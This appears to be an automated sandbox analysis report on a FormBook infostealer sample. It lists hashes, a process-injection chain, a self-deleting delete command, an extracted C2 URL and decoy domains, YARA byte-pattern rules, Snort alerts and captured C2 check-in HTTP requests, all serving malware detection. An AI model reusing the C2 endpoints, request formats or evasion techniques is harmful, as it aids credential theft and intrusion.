
Analysis Report 2435.bat

Overview

General Information

Sample Name: 2435.bat (renamed file extension from bat to exe)
Analysis ID: 433173
MD5: 862b4c2abad2c07ac13d5e051c18ab86
SHA1: c78f0a59312c7902e445c5a31d4896907e96475c
SHA256: c347c2d7579053d263f6ab6eddca7bd03691ebab93b30b5caba462caa7106beb
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 2435.exe (PID: 6304 cmdline: 'C:\Users\user\Desktop\2435.exe' MD5: 862B4C2ABAD2C07AC13D5E051C18AB86)
    • 2435.exe (PID: 6340 cmdline: 'C:\Users\user\Desktop\2435.exe' MD5: 862B4C2ABAD2C07AC13D5E051C18AB86)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • control.exe (PID: 6932 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
          • cmd.exe (PID: 3584 cmdline: /c del 'C:\Users\user\Desktop\2435.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.knighttechinca.com/dxe/"], "decoy": ["sardarfarm.com", "959tremont.com", "privat-livecam.net", "ansel-homebakery.com", "joysupermarket.com", "peninsulamatchmakers.net", "northsytyle.com", "radioconexaoubermusic.com", "relocatingrealtor.com", "desyrnan.com", "onlinehoortoestel.online", "enpointe.online", "rvvikings.com", "paulpoirier.com", "shitarpa.net", "kerneis.net", "rokitreach.com", "essentiallygaia.com", "prestiged.net", "fuerzaagavera.com", "soukid.com", "moderndatingcoach.com", "mentalfreedom.guru", "bullishsoftware.com", "sectorulb.com", "outletyana.com", "fptplaybox.website", "artinmemory.com", "buyruon.com", "ljd.xyz", "mondaysmatters.com", "spiritsoundart.net", "ixiangzu.com", "lacompagniadelfardello.com", "bnctly.com", "sarasvati-yoga.com", "0055game.com", "lagrangewildliferemoval.com", "umlausa.com", "chaytel.com", "kkkc5.com", "union-green.com", "philreid4cc.com", "theanimehat.com", "redlightlegal.com", "myaustraliarewards.com", "barkinlot.com", "mujahidservice.online", "nugeneraonline.com", "sopplugin.com", "makemyroom.design", "ferienschweden.com", "fps2020dkasphotoop.com", "stylezbykay.com", "royalpropertiesgurugram.com", "birzulova.com", "cosmicmtn.com", "kissanime.press", "poweringprogress.today", "omsamedic.com", "drunkpoetsociety.com", "hostbison.com", "asapdecor.com", "houseofsisson.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.2435.exe.24d0000.3.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0.2.2435.exe.24d0000.3.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.2435.exe.24d0000.3.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x18409:$sqlite3step: 68 34 1C 7B E1
        • 0x1851c:$sqlite3step: 68 34 1C 7B E1
        • 0x18438:$sqlite3text: 68 38 2A 90 C5
        • 0x1855d:$sqlite3text: 68 38 2A 90 C5
        • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
1.2.2435.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.2435.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, Malware Configuration Extractor: FormBook (configuration as listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: 2435.exe, ReversingLabs: Detection: 43%
Yara detected FormBook
          Source: Yara matchFile source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.2435.exe.24d0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.2435.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.2435.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.2435.exe.24d0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: 2435.exe, Joe Sandbox ML: detected
          Source: 1.1.2435.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.2435.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.2435.exe.24d0000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.2.control.exe.4d7f834.4.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 9.2.control.exe.43b090.1.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 2435.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: wntdll.pdbUGP source: 2435.exe, 00000000.00000003.228355721.0000000009B60000.00000004.00000001.sdmp, 2435.exe, 00000001.00000002.288517092.0000000000B6F000.00000040.00000001.sdmp, control.exe, 00000009.00000002.497622003.0000000004710000.00000040.00000001.sdmp
          Source: Binary string: control.pdb source: 2435.exe, 00000001.00000002.288197425.0000000000750000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 2435.exe, control.exe
          Source: Binary string: control.pdbUGP source: 2435.exe, 00000001.00000002.288197425.0000000000750000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\2435.exeCode function: 0_2_00405E61 FindFirstFileA,FindClose,0_2_00405E61
          Source: C:\Users\user\Desktop\2435.exeCode function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_0040548B
          Source: C:\Users\user\Desktop\2435.exeCode function: 0_2_0040263E FindFirstFileA,0_2_0040263E

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49719 -> 199.59.242.153:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49719 -> 199.59.242.153:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49719 -> 199.59.242.153:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 34.102.136.180:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: www.knighttechinca.com/dxe/
          Source: global trafficHTTP traffic detected: GET /dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=vA37WJpcpzFfNUYXQYg75GtNYSPqw6GeTU1J6B6lZdudLhYIKqXqgoVRncSpzE3J3g/W HTTP/1.1Host: www.northsytyle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dxe/?EDHT4Ftp=ZFID08xwVlalm506aQGgsOSl52s9DuDXoXMfw5zeIfbqYw75iNwFl9ES5v0dFSHahSDk&Wj0xll=4hH838s0e HTTP/1.1Host: www.shitarpa.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=5uRqQMqQLkS85WfNP4LQlejd47xl1HHY1ecJzVPNghDIfcs4Ugdcj4ECH3F+Zkgn1eRT HTTP/1.1Host: www.houseofsisson.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 199.59.242.153 199.59.242.153
          Source: Joe Sandbox ViewASN Name: BODIS-NJUS BODIS-NJUS
          Source: unknownDNS traffic detected: queries for: www.northsytyle.com
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: control.exe, 00000009.00000002.499880225.000000000526F000.00000004.00000001.sdmpString found in binary or memory: http://houseofsisson.com/dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=5uRqQMqQLkS85WfNP4LQlejd47xl1HHY1ecJzVPNghDI
          Source: 2435.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: 2435.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: C:\Users\user\Desktop\2435.exeCode function: 0_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405042

E-Banking Fraud:

Yara detected FormBook
Source: the same Yara matches (memory dumps and unpacked PEs) listed under AV Detection above.

System Summary:

Malicious sample detected (through community Yara rule)
          Source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.2435.exe.24d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.2435.exe.24d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.2435.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.2435.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.2435.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.2435.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.2435.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.2435.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.2435.exe.24d0000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.2435.exe.24d0000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.2435.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.2435.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00419D60 NtCreateFile,1_2_00419D60
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00419E10 NtReadFile,1_2_00419E10
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00419E90 NtClose,1_2_00419E90
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00419F40 NtAllocateVirtualMemory,1_2_00419F40
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00419D5A NtCreateFile
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00419E0A NtReadFile
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00419E8A NtClose
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00419F3A NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB98F0 NtReadVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB9860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB9840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB99A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB9910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB9A20 NtResumeThread,LdrInitializeThunk
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB9A00 NtProtectVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB9A50 NtCreateFile,LdrInitializeThunk
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB95D0 NtClose,LdrInitializeThunk
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB9540 NtReadFile,LdrInitializeThunk
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB96E0 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB9660 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB97A0 NtUnmapViewOfSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB9780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB9710 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB98A0 NtWriteVirtualMemory
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB9820 NtEnumerateKey
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00ABB040 NtSuspendThread
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB99D0 NtCreateProcessEx
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB9950 NtQueueApcThread
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB9A80 NtOpenDirectoryObject
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB9A10 NtQuerySection
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00ABA3B0 NtGetContextThread
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB9B00 NtSetValueKey
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB95F0 NtQueryInformationFile
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB9520 NtWaitForSingleObject
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00ABAD30 NtSetContextThread
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB9560 NtWriteFile
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB96D0 NtCreateKey
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB9610 NtEnumerateValueKey
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB9670 NtQueryInformationProcess
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB9650 NtQueryValueKey
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB9FE0 NtCreateMutant
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB9730 NtQueryVirtualMemory
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00ABA710 NtOpenProcessToken
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB9760 NtOpenProcess
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB9770 NtSetInformationFile
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00ABA770 NtOpenThread
